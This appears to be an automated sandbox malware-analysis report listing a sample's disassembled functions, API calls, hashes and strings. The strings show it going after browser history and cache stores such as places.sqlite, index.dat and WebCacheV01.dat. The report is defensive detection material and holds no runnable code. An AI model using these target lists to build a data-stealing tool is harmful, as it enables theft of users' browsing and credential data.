                                                                                              • Opcode Fuzzy Hash: 946b4c1fd7f9a1c82d4bd3564eada2d63785a77446bf9af388738d4a416c1506
                                                                                              • Instruction Fuzzy Hash: 7201AD3240421ABBEF219F81DC09FDB3F6AFF09305F14806ABA08501A1D339C5A5EB58
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00413CA4 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloadertimeCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetModuleHandleW.KERNEL32(kernel32.dll,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CB5
                                                                                              • GetProcAddress.KERNEL32(00000000,GetProcessTimes), ref: 00413CCF
                                                                                              • GetProcessTimes.KERNELBASE(00000000,?,?,?,?,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CF2
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: AddressHandleModuleProcProcessTimes
                                                                                              • String ID: GetProcessTimes$kernel32.dll
                                                                                              • API String ID: 1714573020-3385500049
                                                                                              • Opcode ID: 3d2a63fc8b7889f90c1cc675bbb66959c3424aca663c91e440c9d47c6094dacc
                                                                                              • Instruction ID: 0a9fc9a7fb2a98cd878f934f387e3824ef844cc6c25aa3dbb33b58617c33e237
                                                                                              • Opcode Fuzzy Hash: 3d2a63fc8b7889f90c1cc675bbb66959c3424aca663c91e440c9d47c6094dacc
                                                                                              • Instruction Fuzzy Hash: F5F03036204309AFEF008FA6FD06B963BA8BB04742F044066FA0CD1561D7B5D6B0EF99
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 004087B3 Relevance: 7.7, APIs: 6, Instructions: 190COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • memset.MSVCRT ref: 004087D6
                                                                                                • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                                                                • Part of subcall function 004095D9: memset.MSVCRT ref: 004095FC
                                                                                              • memset.MSVCRT ref: 00408828
                                                                                              • memset.MSVCRT ref: 00408840
                                                                                              • memset.MSVCRT ref: 00408858
                                                                                              • memset.MSVCRT ref: 00408870
                                                                                              • memset.MSVCRT ref: 00408888
                                                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: memset$wcslen$AttributesByteCharFileMultiWidewcscatwcscpy
                                                                                              • String ID:
                                                                                              • API String ID: 2911713577-0
                                                                                              • Opcode ID: 01acc2a10158501d086df2ecf85720ba35c535a6b148720ad12018c66e71fd5d
                                                                                              • Instruction ID: a7e5ca25de4111a2a05fe91eb9e7b9268c7acadad77a1a504b595fc773a76dc1
                                                                                              • Opcode Fuzzy Hash: 01acc2a10158501d086df2ecf85720ba35c535a6b148720ad12018c66e71fd5d
                                                                                              • Instruction Fuzzy Hash: BD5146B280011D7EEB50E751DC46EEF776CDF05318F0040BEB948B6182EA745F948BA9
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0041F1A5 Relevance: 7.7, APIs: 3, Strings: 2, Instructions: 165COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: memcmp
                                                                                              • String ID: @ $SQLite format 3
                                                                                              • API String ID: 1475443563-3708268960
                                                                                              • Opcode ID: 82854fe69cd6f085c01fb16587ca6c24c159481fbb1fdb23c3f30c43337b22d0
                                                                                              • Instruction ID: a5e199d7c3355b23248e204991ed7883f9cb1cefd3641e4a8180bf992d12f390
                                                                                              • Opcode Fuzzy Hash: 82854fe69cd6f085c01fb16587ca6c24c159481fbb1fdb23c3f30c43337b22d0
                                                                                              • Instruction Fuzzy Hash: 9051C1719002199BDF10DFA9C4817DEB7F4AF44314F1541AAEC14EB246E778EA8ACB88
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00414C2E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 77registryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 00414B81: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 00414BA4
                                                                                              • memset.MSVCRT ref: 00414C87
                                                                                              • RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                              • wcscpy.MSVCRT ref: 00414CFC
                                                                                                • Part of subcall function 00409CEA: GetVersionExW.KERNEL32(0045D340,0000001A,00414C4F,?,00000000), ref: 00409D04
                                                                                              Strings
                                                                                              • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 00414CA2, 00414CB2
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: AddressCloseProcVersionmemsetwcscpy
                                                                                              • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                                                                              • API String ID: 2705122986-2036018995
                                                                                              • Opcode ID: e6b24c1e526a7e6b175339e46d2c1329f14507f19ad0c7641bd2f64e2867ccb0
                                                                                              • Instruction ID: cfba8ba70a3d5c5eb0df7add68d4968905301debfffe1ddd107e81ced3c7690c
                                                                                              • Opcode Fuzzy Hash: e6b24c1e526a7e6b175339e46d2c1329f14507f19ad0c7641bd2f64e2867ccb0
                                                                                              • Instruction Fuzzy Hash: EE110B31802224ABDB24A7999C4E9EF736CDBD1315F2200A7F80562151F6685EC5C6DE
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 004110DC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 68COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: _wcsicmpqsort
                                                                                              • String ID: /nosort$/sort
                                                                                              • API String ID: 1579243037-1578091866
                                                                                              • Opcode ID: 82532bcf7625f57df0476c9ea77f38d24af0b860564a5aebd85b14b7cf50dee8
                                                                                              • Instruction ID: 59a4a6edbc2c6816dd96362f3638b70d105e8990563e463c72bda517b6347aa4
                                                                                              • Opcode Fuzzy Hash: 82532bcf7625f57df0476c9ea77f38d24af0b860564a5aebd85b14b7cf50dee8
                                                                                              • Instruction Fuzzy Hash: C8213770700201AFD714FB36C880E96F3AAFF58314F11012EE61897692DB39BC918B4A
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0040E5ED Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 61COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • memset.MSVCRT ref: 0040E60F
                                                                                              • memset.MSVCRT ref: 0040E629
                                                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                              Strings
                                                                                              • Microsoft\Windows\WebCache\WebCacheV01.dat, xrefs: 0040E647
                                                                                              • Microsoft\Windows\WebCache\WebCacheV24.dat, xrefs: 0040E66F
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: memsetwcslen$AttributesFilewcscatwcscpy
                                                                                              • String ID: Microsoft\Windows\WebCache\WebCacheV01.dat$Microsoft\Windows\WebCache\WebCacheV24.dat
                                                                                              • API String ID: 3354267031-2114579845
                                                                                              • Opcode ID: 74f633d4b8b79b581db03fb52a9a183d925aa75474fb6f674f7548ec87be104c
                                                                                              • Instruction ID: 2f29c334d396001d9fe1cebc89c879271eb53039ccc8e03d5a3365d75131e7c5
                                                                                              • Opcode Fuzzy Hash: 74f633d4b8b79b581db03fb52a9a183d925aa75474fb6f674f7548ec87be104c
                                                                                              • Instruction Fuzzy Hash: 66118AB3D4012C66EB10E755EC85FDB73ACAF14319F1408B7B904F11C2E6B89F984998
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 004148B6 Relevance: 6.1, APIs: 4, Instructions: 55COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • FindResourceW.KERNELBASE(?,?,?), ref: 004148C3
                                                                                              • SizeofResource.KERNEL32(?,00000000), ref: 004148D4
                                                                                              • LoadResource.KERNEL32(?,00000000), ref: 004148E4
                                                                                              • LockResource.KERNEL32(00000000), ref: 004148EF
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: Resource$FindLoadLockSizeof
                                                                                              • String ID:
                                                                                              • API String ID: 3473537107-0
                                                                                              • Opcode ID: 6eac18842e5c85fe8f5858b83388748d76eef83a8f56414f10f835c55d74c1c4
                                                                                              • Instruction ID: 8a72e2f5d7590eb6bb033c3ed88c96ec9d5eb8bcd973c23d1c6560583cb0a60d
                                                                                              • Opcode Fuzzy Hash: 6eac18842e5c85fe8f5858b83388748d76eef83a8f56414f10f835c55d74c1c4
                                                                                              • Instruction Fuzzy Hash: 0101D2727402156B8B294FB6DD4999BBFAEFFC6391308803AF809D6331DA31C851C688
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0043A9F6 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 979COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              • only a single result allowed for a SELECT that is part of an expression, xrefs: 0043AAD3
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: memset
                                                                                              • String ID: only a single result allowed for a SELECT that is part of an expression
                                                                                              • API String ID: 2221118986-1725073988
                                                                                              • Opcode ID: f2ccd9f22684a9d505166f2bd917588c88a2d89474e41d8808a21707a3bb0a12
                                                                                              • Instruction ID: 0c5fbdb45af1b87466ede92b40025f4dfba1e1eb7e0419b48c64bc8603b8f36f
                                                                                              • Opcode Fuzzy Hash: f2ccd9f22684a9d505166f2bd917588c88a2d89474e41d8808a21707a3bb0a12
                                                                                              • Instruction Fuzzy Hash: 5D827A71608340AFD720DF15C881B1BBBE1FF88318F14491EFA9987262D779E954CB96
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 004175B7 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24sleepCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • Sleep.KERNEL32(00000064), ref: 004175D0
                                                                                              • FindCloseChangeNotification.KERNELBASE(?,00000000,?,0045DBC0,00417C24,?,00000000,00000000,?,00417DE1,?,00000000), ref: 004175D9
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: ChangeCloseFindNotificationSleep
                                                                                              • String ID: }A
                                                                                              • API String ID: 1821831730-2138825249
                                                                                              • Opcode ID: d8d89497e8f27404fcbaadc135fdc6127e9b1f5305c348180eeea445c8f3bba2
                                                                                              • Instruction ID: 75b622f9be81829505acbf4f2e76dfbd2ea822dc2a3448742147a61f3b6dc806
                                                                                              • Opcode Fuzzy Hash: d8d89497e8f27404fcbaadc135fdc6127e9b1f5305c348180eeea445c8f3bba2
                                                                                              • Instruction Fuzzy Hash: B7E0CD3B1045156ED500577DDCC099773E9EF892347144226F171C25D0C6759C828524
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 004125B6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 18COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: ??3@DeleteObject
                                                                                              • String ID: r!A
                                                                                              • API String ID: 1103273653-628097481
                                                                                              • Opcode ID: 50c536e2c83fb8bec4500b48a67d64bb266b61e0188dcb515110e4721c15bf1b
                                                                                              • Instruction ID: d381ae2e1f6c469d4091c7bd434485f036f098756071eb86a226830a39d2e28c
                                                                                              • Opcode Fuzzy Hash: 50c536e2c83fb8bec4500b48a67d64bb266b61e0188dcb515110e4721c15bf1b
                                                                                              • Instruction Fuzzy Hash: 72E04F75000302DFD7115F26E400782B7F5FF85315F11455EE89497151EBB96164CE19
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0040D092 Relevance: 5.1, APIs: 4, Instructions: 51COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: ??2@
                                                                                              • String ID:
                                                                                              • API String ID: 1033339047-0
                                                                                              • Opcode ID: bb5a2cedd882201272bd117211a6380788fbbee7b2a1ea69d9384cb42441e8af
                                                                                              • Instruction ID: 5f4fc1bc6a90e200713bb7744dd8ab6a017b0cf4e98027731d5581fdeff4b0c3
                                                                                              • Opcode Fuzzy Hash: bb5a2cedd882201272bd117211a6380788fbbee7b2a1ea69d9384cb42441e8af
                                                                                              • Instruction Fuzzy Hash: B00121B2A413005EEB7ADF38EE5772966A0AF4C351F01453EA246CD1F6EEF58480CB49
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00444B06 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 108COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 004449E7
                                                                                                • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 004449F8
                                                                                                • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A09
                                                                                                • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A1A
                                                                                                • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A2B
                                                                                                • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A3C
                                                                                                • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A4D
                                                                                              • memcmp.MSVCRT ref: 00444BA5
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: AddressProc$memcmp
                                                                                              • String ID: $$8
                                                                                              • API String ID: 2808797137-435121686
                                                                                              • Opcode ID: e80885fdbb6a557c0c44277052daa68a3f3074bd67b4db13da85d3ecc8de475b
                                                                                              • Instruction ID: 2c4e4273d6b09173b98ec99ba1a72f96ebc6587eba5c15334d9e54441f883a66
                                                                                              • Opcode Fuzzy Hash: e80885fdbb6a557c0c44277052daa68a3f3074bd67b4db13da85d3ecc8de475b
                                                                                              • Instruction Fuzzy Hash: 04314171A00209ABEB10DFA6CDC1BAEB7B9FF88314F11055AE515A3241D778ED048B69
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0040E4B2 Relevance: 4.6, APIs: 3, Instructions: 87fileCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 0040E01E: OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                                                                                                • Part of subcall function 0040E01E: GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                                                                                                • Part of subcall function 0040E01E: DuplicateHandle.KERNELBASE(?,00000104,00000000), ref: 0040E0BF
                                                                                                • Part of subcall function 0040E01E: GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                                                                                                • Part of subcall function 0040E01E: CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                                                                                                • Part of subcall function 0040E01E: MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                                                                                                • Part of subcall function 0040E01E: WriteFile.KERNELBASE(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                                                                                                • Part of subcall function 0040E01E: UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
                                                                                                • Part of subcall function 0040E01E: FindCloseChangeNotification.KERNELBASE(?), ref: 0040E13E
                                                                                              • FindCloseChangeNotification.KERNELBASE(000000FF,000000FF,00000000,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E582
                                                                                                • Part of subcall function 0040E2AB: memset.MSVCRT ref: 0040E380
                                                                                                • Part of subcall function 0040E2AB: wcschr.MSVCRT ref: 0040E3B8
                                                                                                • Part of subcall function 0040E2AB: memcpy.MSVCRT ref: 0040E3EC
                                                                                              • DeleteFileW.KERNELBASE(?,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E5A3
                                                                                              • CloseHandle.KERNEL32(000000FF,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E5CA
                                                                                                • Part of subcall function 0040E175: memset.MSVCRT ref: 0040E1BD
                                                                                                • Part of subcall function 0040E175: _snwprintf.MSVCRT ref: 0040E257
                                                                                                • Part of subcall function 0040E175: ??3@YAXPAX@Z.MSVCRT ref: 0040E28B
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: File$Close$ChangeFindHandleNotificationProcessViewmemset$??3@CreateCurrentDeleteDuplicateMappingOpenSizeUnmapWrite_snwprintfmemcpywcschr
                                                                                              • String ID:
                                                                                              • API String ID: 1042154641-0
                                                                                              • Opcode ID: 8c4b04af935ef543e183fc2d5fdeec50da417ae7152dfd79b37e36c3b45d6897
                                                                                              • Instruction ID: 90d235a97b45fa8760f9e747b2c38a4e83ddeae1161d8ec943a7631d31c9d9e7
                                                                                              • Opcode Fuzzy Hash: 8c4b04af935ef543e183fc2d5fdeec50da417ae7152dfd79b37e36c3b45d6897
                                                                                              • Instruction Fuzzy Hash: DA312CB1C00618ABCF60DF96CD456CEF7B8AF44318F1006AB9518B31A1DB755E95CF58
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00418758 Relevance: 4.6, APIs: 3, Instructions: 79COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 00418680: GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
                                                                                                • Part of subcall function 00418680: malloc.MSVCRT ref: 004186B7
                                                                                                • Part of subcall function 00418680: ??3@YAXPAX@Z.MSVCRT ref: 004186C7
                                                                                                • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                                              • GetDiskFreeSpaceW.KERNELBASE(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187D2
                                                                                              • GetDiskFreeSpaceA.KERNEL32(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187FA
                                                                                              • ??3@YAXPAX@Z.MSVCRT ref: 00418803
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: ??3@DiskFreeSpace$FullNamePathVersionmalloc
                                                                                              • String ID:
                                                                                              • API String ID: 2947809556-0
                                                                                              • Opcode ID: 7494654f5416982ac8b8eb6095e1b911d56786f256e13b4958c27deb7a97d588
                                                                                              • Instruction ID: 9f5aa8738ec5ca8fa6c7af21032fcab0d24b7c3e7281463e4f88d86f77cdc7da
                                                                                              • Opcode Fuzzy Hash: 7494654f5416982ac8b8eb6095e1b911d56786f256e13b4958c27deb7a97d588
                                                                                              • Instruction Fuzzy Hash: 2A218776904118AEEB11EBA4CC849EF77BCEF05704F2404AFE551D7181EB784EC58769
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00403A16 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 67COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C09
                                                                                                • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C1E
                                                                                                • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C47
                                                                                                • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C70
                                                                                              • memset.MSVCRT ref: 00403A55
                                                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                                                                • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A908
                                                                                                • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A92B
                                                                                                • Part of subcall function 0040A8D0: memcpy.MSVCRT ref: 0040A94F
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: memsetwcscatwcslen$??3@$AttributesFilememcpywcscpy
                                                                                              • String ID: history.dat$places.sqlite
                                                                                              • API String ID: 3093078384-467022611
                                                                                              • Opcode ID: 7e5fa77ffbd80df454c8f06c208cb8abd3a99e536342b00205f9bee392087e79
                                                                                              • Instruction ID: 4d52d99a2018a06e8b3479be55870673e402391ac5db5fe9af26a684ed702786
                                                                                              • Opcode Fuzzy Hash: 7e5fa77ffbd80df454c8f06c208cb8abd3a99e536342b00205f9bee392087e79
                                                                                              • Instruction Fuzzy Hash: CA112EB2A0111866DB10FA66CD4AACE77BCAF54354F1001B7B915B20C2EB3CAF45CA69
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 004175ED Relevance: 4.5, APIs: 3, Instructions: 49fileCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 00417570: SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00417591
                                                                                                • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A2
                                                                                                • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A8
                                                                                              • ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 0041761D
                                                                                              • GetLastError.KERNEL32 ref: 00417627
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorLast$File$PointerRead
                                                                                              • String ID:
                                                                                              • API String ID: 839530781-0
                                                                                              • Opcode ID: 35ac1a26cfbf5729ffddcbfd3a0d39ca45c1cff254cac5b3720273d0b32ffa80
                                                                                              • Instruction ID: c9208e3d43fc8ff2949f7201360c8f82def2114e122364bdeb0a9035ecfb973e
                                                                                              • Opcode Fuzzy Hash: 35ac1a26cfbf5729ffddcbfd3a0d39ca45c1cff254cac5b3720273d0b32ffa80
                                                                                              • Instruction Fuzzy Hash: D001A236208204BBEB008F69DC45BDA3B78FB153B4F100427F908C6640E275D89096EA
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0040C1D3 Relevance: 4.5, APIs: 1, Strings: 2, Instructions: 45COMMON
                                                                                              Download Yara Rule
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: FileFindFirst
                                                                                              • String ID: *.*$index.dat
                                                                                              • API String ID: 1974802433-2863569691
                                                                                              • Opcode ID: da4ae6558bc3f7d8c9357f2fa5faf2f590160579c2a5e59c58801196d12f8aed
                                                                                              • Instruction ID: 5c3219b8572ff4376619b1de75d6d1d1b7443a793578eadcc31bed7d77429009
                                                                                              • Opcode Fuzzy Hash: da4ae6558bc3f7d8c9357f2fa5faf2f590160579c2a5e59c58801196d12f8aed
                                                                                              • Instruction Fuzzy Hash: 0E01257180125895EB20E761DC467DF766C9F04314F5002FB9818F21D6E7389F958F9A
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 004099F4 Relevance: 4.5, APIs: 3, Instructions: 38COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: ??3@mallocmemcpy
                                                                                              • String ID:
                                                                                              • API String ID: 3831604043-0
                                                                                              • Opcode ID: a8c2b4a2abbe370f156afd1ac3a64450955b5e367f985048e5f3f029e510ba1a
                                                                                              • Instruction ID: 1240433d41d023da9ba75aa62d017d874606d7cfbee4c78203c9aa8101697722
                                                                                              • Opcode Fuzzy Hash: a8c2b4a2abbe370f156afd1ac3a64450955b5e367f985048e5f3f029e510ba1a
                                                                                              • Instruction Fuzzy Hash: 88F0E9727092219FC708AE75A98180BB79DAF55314B12482FF404E3282D7389C50CB58
